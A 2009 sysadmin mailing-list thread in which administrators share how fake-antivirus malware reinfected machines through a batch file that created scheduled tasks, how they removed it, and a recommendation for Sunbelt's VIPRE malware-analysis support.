Ever need to deal with "The Coppertop" (Tammy)? She's Sunbelt's malware analyst and is extremely knowledgable regarding the boot processes, what belongs, what does not, what drivers should be loaded and when (ie, knows how to spot root kits), etc.
VIPRE (and CSE) customers have access to her services, and she has helped us clean out some well-hidden crud more than once! Add her services to the reasons to consider VIPRE. -- Richard D. McClary Systems Administrator, Information Technology Group ASPCA® 1717 S. Philo Rd, Ste 36 Urbana, IL 61802 [email protected] P: 217-337-9761 C: 217-417-1182 F: 217-337-9761 www.aspca.org The information contained in this e-mail, and any attachments hereto, is from The American Society for the Prevention of Cruelty to Animals® (ASPCA ®) and is intended only for use by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you are not the intended recipient of this e-mail, you are hereby notified that any dissemination, distribution, copying or use of the contents of this e-mail, and any attachments hereto, is strictly prohibited. If you have received this e-mail in error, please immediately notify me by reply email and permanently delete the original and any copy of this e-mail and any printout thereof. "John Aldrich" <[email protected]> wrote on 12/04/2009 09:07:40 AM: > Yeah?this malware had literally at least a dozen scheduled tasks, > which makes me think it was probably 1) running at boot/login 2) > hourly at the very least. > > [image removed] [image removed] > > From: Erik Goldoff [mailto:[email protected]] > Sent: Friday, December 04, 2009 9:54 AM > To: NT System Admin Issues > Subject: RE: New virus trick > > saw a similar mechanism used to reinfect qakbot systems, scheduled > task was on a 4 day timer. > > Erik Goldoff > IT Consultant > Systems, Networks, & Security > > > > From: John Aldrich [mailto:[email protected]] > Sent: Friday, December 04, 2009 9:39 AM > To: NT System Admin Issues > Subject: New virus trick > I was at a seminar yesterday put on by Sunbelt and during a break I > had a chance to talk to one of the presenters and told him of a > recent malware incident I?d cleaned up. He?d never heard of such a > trick before so I thought I?d bring it to y?all?s attention so you > can be on the lookout for it. Basically it was the same old malware > that?s been going around with the Antivirus Pro sort of stuff, but > the twist was that even using Malware Bytes we were not able to get > rid of it. After I was poking around a bit, (I don?t recall why I > was looking at the root of C:, but I was) I noticed a batch file in > the root of the C: drive that, when I opened it and looked at it, it > created a bunch of scheduled tasks to re-download the > malware/adware. I wised up and deleted that file, then went into the > Scheduled Tasks and deleted all the malware-created scheduled tasks. > Then I was able to successfully clean the stuff out! > What really got us was that Malware Bytes would clean it, then say > it needed to reboot to finish, and then as soon as we came back, the > fake antivirus was right back there. What I believe it was doing was > re-downloading itself from the internet each time we cleaned it. So, > anyway, if you guys ever have a problem like this, it wouldn?t hurt > to check the scheduled tasks! > > [image removed] [image removed] > > > > > > No virus found in this incoming message. > Checked by AVG - www.avg.com > Version: 8.5.426 / Virus Database: 270.14.93/2544 - Release Date: > 12/04/09 07:32:00 > > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
